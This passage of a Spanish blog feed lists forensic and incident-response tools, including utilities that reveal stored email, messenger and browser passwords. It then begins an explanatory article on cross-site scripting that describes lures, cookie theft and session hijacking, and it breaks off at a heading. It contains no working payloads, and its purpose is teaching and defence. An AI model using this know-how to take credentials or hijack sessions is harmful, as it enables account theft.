<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Drive Manager (v. 3.23)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.alexnolan.net/software/driveman.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">50]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Ha sido escrito para ayudarle a identificar las unidades que son del mismo tipo. Además de la etiqueta de volumen también muestra la información de los proveedores a fin de diferenciar múltiples unidades de CD/DVD y memorias por el nombre del fabricante, versión y fecha de revisión. También permite utilizar el número de serie como un número de identificación exclusivo para cada unidad.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>FAU (v. 1035)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://users.erols.com/gmgarner/forensics/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">51]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Herramienta de respuesta a incidentes que puede utilizarse para crear la imagen de un sistema, y de los dispositivos conectados.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>FTK Imager (v. 2.5.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.accessdata.com/support/downloads/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">53]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Permite adquirir imágenes de dispositivos físicos y lógicos, ver los datos de sistemas que utilizan FAT, NTFS, EXT 2 y 3, así como HFS y HFS +. Además, permite la creación de imágenes múltiples de una sola fuente y / o múltiples imágenes simultáneamente</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>galleta (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foundstone.com/resources/proddesc/galleta.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">54]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">galleta analiza la información de un archivo de cookies y permite que el resultado sea importado a su programa de hoja de cálculo favorita. Galleta está construido para trabajar en múltiples plataformas y se ejecutará en Windows (a través de Cygwin), Mac OS X, Linux y plataformas * BSD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>HoverSnap (v. 0.8)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.hoverdesk.net/freeware.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">55]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una herramienta libre que permite tomar capturas de pantalla completa, ventana activa o de un área seleccionada</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>IECookiesView (v. 1.70)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/iecookies.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">56]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una pequeña utilidad que muestra los detalles de todas las cookies que IE almacena en una computadora. Además, permite ordenar los cookies, borrarlos, y ver información detallada acerca de cada uno de ellos e incluso permite guardar los &#8220;cookies&#8221; en un archivo de texto legible. Si se está conectado a una red, es posible ver las cookies de otros equipos</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>IEHistoryView (v. 1.32)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/iehv.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">57]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Permite ver y modificar el historial de las páginas web visitadas en Internet Explorer. También puede exportar elementos seleccionados a un archivo HTML.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>IRCR (v. 2.3</strong>) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://tools.phantombyte.com/"><span style="font-family:Arial;font-size:x-small;"><span style="text-decoration:underline;">58]</span></span></a><span style="font-family:Arial;font-size:x-small;"> Es un script para llamar a una colección de herramientas que recoge y / o analiza los datos de un sistema Microsoft Windows. Se puede ver como una captura del sistema en el pasado. La mayoría de las herramientas están orientadas a la recopilación de datos en lugar de análisis.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Mail PassView (v. 1.36)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/mailpv.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">59]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una herramienta para la recuperación de contraseñas que revela las contraseñas y otros detalles de la cuenta para los siguientes clientes de correo electrónico: Outlook Express, Microsoft Outlook 2000, Microsoft Outlook 2002 / 2003, IncrediMail, Eudora, Netscape 6.x/7.x, Mozilla Thunderbird, Grupo Correo gratuito, Yahoo! Correo, Aplicación Messenger, Hotmail / MSN mail y Gmail.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>MEMD</strong></span><span style="font-family:Arial;font-size:small;"><strong>ump (v. 2.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.tssc.de/index.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">60]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Está diseñado para arrojar o copiar cualquier parte de 4GB de memoria de direcciones bajo MS-DOS y Windows 9x DOS a una consola de texto o archivo binario.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>MessenPass (v. 1.08)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/mspass.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">61]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Permite recuperar la contraseña de una amplia variedad de programas populares de mensajería instantánea, incluyendo MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger , AOL Instant Messenger / Netscape 7, Trillian, GAIM y Miranda. Simplemente ejecute el programa y, este le mostrará una lista de todas las cuentas que se encuentran almacenadas en su PC, incluido el nombre de usuario y contraseñas</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>MozillaCookiesView (v. 1.11)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/mzcv.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">62]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una alternativa a la “Cookie Manager” proporcionada por los navegadores Netscape y Mozilla. Muestra los detalles de todas las cookies almacenadas en el interior del archivo de cookies (cookies.txt) en una tabla.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Recuperación de contraseña de red (v. 1.03) </strong></span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/network_password_recovery.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">63]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Puede recuperar todas las contraseñas de red almacenados en su además de las cuentas de. NET Passport que se almacenan localmente.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>PC Inspector File Recovery (v. 4.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.pcinspector.de/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">65]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un programa de recuperación de datos que soporta los sistemas de archivos FAT 12/16/32 y NTFS. Encuentra automáticamente las particiones, incluso si el sector de arranque o FAT ha sido borrado o dañado.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>PC On / Off Time (v. 2.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.snapfiles.com/get/pconoff.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">66]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Esta herramienta de seguimiento muestra las veces que una computadora ha estado activa durante las últimas 3 semanas.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Process Explorer (v. 10.2)</strong> </span><a href="http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">67]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Consta de dos ventanas. La ventana superior muestra una lista de los procesos que se encuentran activos, incluyendo los nombres de sus propietarios, mientras que la información que se muestra en la ventana inferior depende del modo en que <em>Process Explorer</em> está.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Storage PassView (v. 1.63</strong>) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/pspv.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">68]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una pequeña utilidad que revela las contraseñas almacenadas en una computadora por Internet Explorer y Outlook Express. Incluyen todo el correo electrónico y las contraseñas de los sitios web para los que se ha elegido la opción de &#8220;recordar contraseña&#8221;, así como la opción auto-completar las contraseñas.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>PsTools Suite (v. 2.34)</strong> </span><a href="http://www.microsoft.com/technet/sysinternals/utilities/pstools.mspx"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">69]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Las herramientas incluidas en la suite PsTools, que se descarga de manera individual o en conjunto, son las siguientes</span><span style="font-family:Arial;font-size:small;">:</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">PsExec &#8211; ejecutar los procesos de forma remota  </span></p>
<p align="justify">     <span style="font-family:Arial;font-size:x-small;">PsFile &#8211; muestra los archivos abiertos remotamente</span></p>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsGetSid &#8211; mostrar el SID de un computadora o un usuario</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsKill &#8211; matar procesos por su nombre o ID de proceso</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsInfo &#8211; lista información sobre un sistema</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsList &#8211; lista detallada información sobre los procesos</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsLoggedOn &#8211; ver que el registrado a nivel local ya través de la distribución de los recursos</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsLogList &#8211; volcado de los registros de registro de eventos</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsPasswd &#8211; cambios de contraseñas de cuentas</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsService &#8211; ver y controlar los servicios</span></p>
</ul>
<ul>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">PsShutdown -  apaga y reinicia la pc.</span> <br />
 <br />
 <br />
 <br />
 <br />
 </ul>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Pst Password Viewer (v. 1.00</strong>) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/pst_password.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">70]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">El cifrado de contraseña mediante PST es muy débil, ya que para cada archivo protegido por contraseña PST, existen varias contraseñas que pueden abrirlo. PstPassword ofrece 3 opciones diferentes de contraseñas. Es posible que una de ellas sea la contraseña original, pero también es posible que ninguna de estas contraseñas lo sean, sin embargo, las 3 contraseñas proporcionada por PstPassword se abrirá el archivo PST sin problemas</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>reg (v.)</strong> </span><a href="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/reg.mspx?mfr=true"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">73]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Muestra la información del registro y los valores en las entradas del registro, para el usuario local</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>RegScanner</strong> (v. 1.30) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/regscanner.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">74]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Permite escanear el registro, encontrar los valores de Registro que coincidan con los criterios de búsqueda especificados, y los muestra en una lista.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>ReSysInfo (v. 2.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.dominik-reichl.de/freeware.shtml"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">75]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es visor de la información de un sistema de Windows. La herramienta cuenta con 25 módulos de información: información BIOS, CMOS, escritorio, DirectX, unidades, fuentes, teclado, APM, Mainboard, MCI, mouse, multimedia, red, OpenGL, contraseñas, puertos, impresoras y fax, los procesos, procesador, sistema de video, información general acerca de Windows y un resumen. ReSysInfo se puede exportar la información a 3 diferentes formatos: TXT, HTML y XML.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>rifiuti (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foundstone.com/resources/proddesc/rifiuti.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">76]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Rifiuti analizará la información en un archivo INFO2 y  los resultados podrán ser importados a su programa de hoja de cálculo favorita. Rifiuti está construido para trabajar en múltiples plataformas y se ejecutará en Windows (a través de Cygwin), Mac OS X, Linux y plataformas * BSD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Rootkit (v. 1.7)</strong> </span><a href="http://www.microsoft.com/technet/sysinternals/Security/RootkitRevealer.mspx"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">77]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Rootkit es una utilidad avanzada de detección de rootkit. Funciona en Windows NT 4.0</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Secreport (v. 3.27.07)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://members.verizon.net/~vze3vkmg/index.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">78]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una pequeña suite de dos herramientas de línea de comandos utilizadas para recopilar información relacionada con la seguridad de un sistema basado en Windows. Se puede utilizar estas herramientas para evaluar rápidamente el nivel de seguridad de un sistema de Windows y comparar los resultados con la línea de partida.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Windows Forensic Toolchest (v. 2.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foolmoon.net/security/wft/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">79]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Fue escrito para proporcionar un sistema automatizado de respuesta a incidentes en un sistema Windows y recoger la información de seguridad pertinente al sistema. Una persona con conocimientos de seguridad puede utilizarla para buscar signos de un incidente. Ofrece extensas posibilidades de log de todas sus acciones a lo largo de la operación realizando sumas de comprobación MD5 a lo largo del camino para asegurar que su producción es verificable.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Winaudit (v. 2.15)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.pxserver.com/WinAudit.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">80]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">WinAudit es fácil de usar, no es necesario tener conocimientos especiales para utilizar el programa. Se trata de un archivo <em>self-contained</em> único que no necesita instalación o configuración. Este programa puede ejecutarse desde un disquete o memoria USB. Simplemente se descarga el programa y se da un doble clic en el para utilizarlo. La interfaz de usuario ha sido traducida a varios idiomas gracias a muchas personas. El programa reporta prácticamente cada aspecto del inventario y configuración de la computadora. Los resultados son mostrados en un formato de página web, clasificando en categorías los resultados para facilitar la lectura y la búsqueda  Tanto si se esta interesado en el software instalado, el inventario de hardware, soporte técnico, seguridad o simplemente por curiosidad, WinAudit lo tiene todo. El programa tiene diversas herramientas para diagnostico de fallas del disco duro, mapeo de puertos, velocidad de conexión, así como la configuración del firewall y las actualizaciones de Windows ®</span></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/togusds.wordpress.com/12/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/togusds.wordpress.com/12/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/togusds.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/togusds.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/togusds.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/togusds.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/togusds.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/togusds.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/togusds.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/togusds.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/togusds.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/togusds.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=12&subd=togusds&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://togusds.wordpress.com/2008/09/16/helix-live-cd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/dd3e4a6c7b6fc913f4ae2ec945898ff9?s=96&#38;d=identicon" medium="image">
			<media:title type="html">togusds</media:title>
		</media:content>
	</item>
		<item>
		<title>XSS</title>
		<link>http://togusds.wordpress.com/2008/09/11/xss/</link>
		<comments>http://togusds.wordpress.com/2008/09/11/xss/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 03:12:20 +0000</pubDate>
		<dc:creator>togusds</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>

		<guid isPermaLink="false">http://togusds.wordpress.com/?p=3</guid>
		<description><![CDATA[Los sitios Web de la actualidad son más complejos que nunca, contienen una gran cantidad de contenido dinámico, haciendo que la experiencia del usuario sea más agradable. El contenido dinámico se logra a través del uso de aplicaciones Web que pueden enviar diferentes salidas a sus usuarios dependiendo de su configuración y necesidades. Los sitios [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=3&subd=togusds&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p class="Contenidodelatabla"><span lang="ES-MX">Los sitios Web de la actualidad son más complejos que nunca, contienen una gran cantidad de contenido dinámico, haciendo que la experiencia del usuario sea más agradable. El contenido dinámico se logra a través del uso de aplicaciones Web que pueden enviar diferentes salidas a sus usuarios dependiendo de su configuración y necesidades. Los sitios dinámicos sufren de una amenaza que no afecta a los sitios estáticos, llamada Cross Site Scripting (XSS) </span></p>
<p class="Contenidodelatabla"><span lang="ES-MX">Este tipo de ataques se hacen cada vez más populares entre los hackers ya que es relativamente sencillo encontrar agujeros que permiten explotar esta vulnerabilidad Cada mes se descubren entre 10 y 25 agujeros XSS en productos comerciales.</span></p>
<p class="Contenidodelatabla"><span lang="ES-MX">Los sitios Web que utilizan SSL (para https) NO tienen mayor protección que aquellos sitios que carecen de esta protección, ya que las aplicaciones Web trabajan de la misma manera que antes, excepto que el ataque se realiza en una conexión cifrada. </span></p>
<p class="Contenidodelatabla">Es una vulnerabilidad que muchos desarrolladores dejan pasar por alto, quizás por falta de un planeamiento de análisis de riesgos en el proceso de diseño, desarrollo e implementación de sus aplicativos, o simplemente no lo vean como una falla que les va a presentar problemas en su aplicación, incluso por desconocimiento de esta vulnerabilidad.</p>
<p class="Contenidodelatabla"><span lang="ES-MX">Sea cual sea el motivo por el cual no se ejecuten medidas de prevención con respecto a esta vulnerabilidad, es necesario saber, que es un tipo de ataque que se extiende cada día mas, hoy en día es muy común encontrar sitios y usuarios afectados por este tipo de agresión.<span>  </span>Sitios como FBU.gov, CNN.com, Time.com, Ebay.com, Yahoo, entre otros han tenido una forma u otra de vulnerabilidades XSS. En los últimos meses, en México, se detecto esta vulnerabilidad en los routers del mayor proveedor de Internet de México, Telmex, que permitió redireccionar a los usuarios de cierto portal bancario. </span></p>
<p class="MsoNormal">Para ejecutar este tipo de ataque no es necesario ser un guru en el campo de la programación, ni desarrollar o utilizar herramientas complejas, basta con manejar un poco de las etiquetas de HTML y algún lenguaje de Scripting.</p>
<p class="MsoNormal"><span lang="ES-MX">La clave primordial en el campo de la seguridad es no confiar en la entrada de datos de ningún usuario, ya que en algún momento estas entradas se puede convertir en una inserción de código malicioso, es por ello que la aplicación debe de validar cada uno de los campos en donde el usuario pueda o le sea requerido el ingreso de datos y dejar de lado la política de confianza al usuario. </span></p>
<p class="MsoNormal"><strong>Definición de Cross-Site-Scripting</strong></p>
<p class="MsoNormal"><span lang="ES-MX">El Cross-Site-Scripting es una vulnerabilidad que aprovecha la falta de mecanismos de filtrado en los campos de entrada y permiten el ingreso y envió de datos sin validación alguna, aceptando el envió de scripts completos, pudiendo generar secuencias de comandos maliciosas que impacten directamente en el sitio o en el equipo de un usuario. El Cross-Site-Scripting es una vulnerabilidad que puede causar un impacto tanto a una aplicación web como a usuarios que de manera inconsciente activen dicha secuencia de comandos. </span></p>
<p class="Contenidodelatabla"><span lang="ES-MX">Ocurre cuando la aplicación web acepta datos maliciosos de un usuario. Estos datos son por lo general enviados a través de un hipervínculo que contiene el código maligno. El usuario puede hacer clic en un enlace desde otro sitio Web, un mensajero instantáneo o simplemente al leer un tablero de mensajes o un e-mail. Usualmente el atacante cifrara la porción dañina del link en código HEX (o con algún otro método de cifrado) así que la petición se ve menos sospechosa para los usuarios. Después de que la información fue recabada por la aplicación Web, se crea una página de salida para el usuario que envió el código, pero de manera que parece la página válida del sitio. Muchos foros y libros de visitas permiten a los usuarios publicar entradas con html y javascript en él.</span></p>
<p class="MsoNormal"><span lang="ES-MX">Un atacante puede usar XSS para enviar scripts maliciosos a un usuario ingenuo. El navegador del usuario no tiene forma de saber que no debe confiar en un determinado script y lo ejecutará. Ya que piensa que viene de una fuente confiable, pudiendo acceder a los cookies, tokens de sesión o cualquier información retenida por el navegador y que es usada por el sitio. Los scripts pueden incluso reescribir el contenido de la página.</span></p>
<p class="MsoNormal"><span lang="ES-MX">Los ataques XSS son divididos por lo general en dos categorías: almacenados y reflejados. </span><span>Los ataques almacenados son aquellos donde el código inyectado se almacena permanentemente en el servidor, como en una base de datos, en un foro de mensajes, libros de visita, etc. Los ataques reflejados se refiere a aquellos donde el código inyectado es reflejado por el servidor Web, como en un mensaje de error, o en los resultados de una búsqueda. Estos ataques son enviados a la victima usando otras vías como un e-mail, o algún otro servidor Web. Cuando un usuario cae en la trampa el código inyectado viaja al servidor Web vulnerable, que a su vez refleja el ataque hacia el navegador del usuario. El navegador ejecuta el script, ya que viene de un servidor “confiable”.</span></p>
<p class="MsoNormal"><strong>¿A quien Afecta?</strong></p>
<p class="MsoNormal"><span lang="ES-MX">El Cross-Site-Scripting es una vulnerabilidad que puede causar un impacto tanto a una aplicación web como a usuarios que de manera inconsciente activen dicha secuencia de comandos. Dicho código malicioso se compone de cadenas de datos cuyo contenido son scripts completos contenidos en enlaces o ejecutados desde formularios. </span></p>
<p class="MsoNormal"><span lang="ES-MX">En caso de que sea ejecutado el script se ejecutara en el equipo del usuario con todos los privilegios permitidos por las políticas de seguridad configuradas en el navegador del usuario o del sitio visitado, pudiendo realizar acciones diversas como la captura de cookies de usuario o la activación de servicios y componentes del sistema operativo del usuario victima. </span></p>
<p class="MsoNormal"><span lang="ES-MX">La mayor problemática es que estas cadenas de código se encuentran ocultas a la sombra de vínculos, de los cuales, el usuario normalmente no revisa el código y lo ejecuta con una política de confianza total, dicha ejecución se realiza de una manera indirecta, ya sea por una activación vía hipervínculo o por la ejecución al momento de la carga de un sitio afectado por este tipo de ataque, el atacante no realiza su acción pensando en un usuario en especifico si no que actúa de manera de que afectan a cualquier usuario que inocentemente caiga en dicha trampa, las formas mas comunes de realizar dicha agresión es por medio de correos electrónicos, vínculos falsos o ataques directos a sitios no preparados para este tipo de ataque.</span></p>
<p class="MsoNormal">Podemos encontrar una clasificación simple:</p>
<p class="MsoNormal"><span lang="ES-MX"><span>1.<span>    </span></span></span><span lang="ES-MX">Ataque al usuario. </span></p>
<p class="MsoNormal"><span lang="ES-MX"><span>2.<span>    </span></span></span><span lang="ES-MX">Ataque al Aplicativo. </span></p>
<p class="MsoNormal"><strong>1. Ataque al Usuario</strong></p>
<p class="MsoNormal"><span lang="ES-MX">Este es el ataque mas frecuente, debido al potencial de la información que se puede obtener mediante este tipo de agresión, ya que dependiendo del nivel de ingenio del atacante puede obtener información importante de un usuario victima extrayendo sus cookies y consiguiendo información almacenada en ellas o robando su sesión de usuario en un sitio web especifico. </span></p>
<p class="MsoNormal"><span lang="ES-MX">Dentro de las diversas formas de ataque veremos dos de las más comunes. </span></p>
<p class="MsoNormal"><span lang="ES-MX"><strong>Ataque vía correo electrónico: </strong></span></p>
<p class="MsoNormal"><span lang="ES-MX">Se basa en el envió de un correo electrónico a un usuario con un script oculto en un link a una dirección web, el atacante buscando motivar a su victima a seguir el enlace le ofrece un premio, regalo u oferta si visita dicho vinculo, al verse atraído por la información en el correo electrónico el usuario hace clic en el vinculo sin darse cuenta de que esta activando una secuencia de comandos que se ejecutaran en su equipo local, que podrían extraer sus cookies, eliminar archivos y en el caso mas fatal formatear su disco duro, mediante la invocación de programas con parámetros aleatorios. </span></p>
<p class="MsoNormal"><span lang="ES-MX"><strong>Ataque vía publicación en Sitios Vulnerables: </strong></span></p>
<p class="MsoNormal"><span lang="ES-MX">Esta segunda forma se basa en la publicación de datos en blogs, foros, libros de visitas o sitios que permiten reflejar información enviada por un usuario y que no es validada por el servidor, donde podremos esconder secuencias de comandos detrás de un vinculo o imagen, este ataque tiene la misma finalidad que el anterior, pero con un mayor alcance de usuarios afectados. </span></p>
<p class="MsoNormal">Esta vulnerabilidad puede estar de forma directa (foros, mensajes de error, etc) o indirecta (redirecciones, frame sets, etc)</p>
<p class="MsoNormal"> </p>
<table class="MsoNormalTable" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top">
<p class="Contenidodelatabla"><strong><span lang="ES-MX">Tipo</span></strong></p>
</td>
<td valign="top">
<p class="Contenidodelatabla"><strong><span lang="ES-MX">Manejo</span></strong></p>
</td>
</tr>
<tr>
<td valign="top">
<p class="Contenidodelatabla"><span lang="ES-MX">Directa</span></p>
</td>
<td valign="top">
<p class="Contenidodelatabla"><span lang="ES-MX">Este tipo de XSS,   es el que normalmente es censurado, así que es muy poco común que se pueda   usar etiquetas como &lt;script o &lt;iframe&gt;</span></p>
</td>
</tr>
<tr>
<td valign="top">
<p class="Contenidodelatabla"><span lang="ES-MX">Indirecta</span></p>
</td>
<td valign="top">
<p class="Contenidodelatabla"><span lang="ES-MX">Esta es un tipo de   vulnerabilidad, muy común, y muy poco explotada, consiste en modificar   valores que la aplicación web utiliza para pasar variables entre 2 páginas,   sin usar sesiones.</span></p>
</td>
</tr>
</tbody>
</table>
<p class="MsoNormal"><strong>Directa</strong></p>
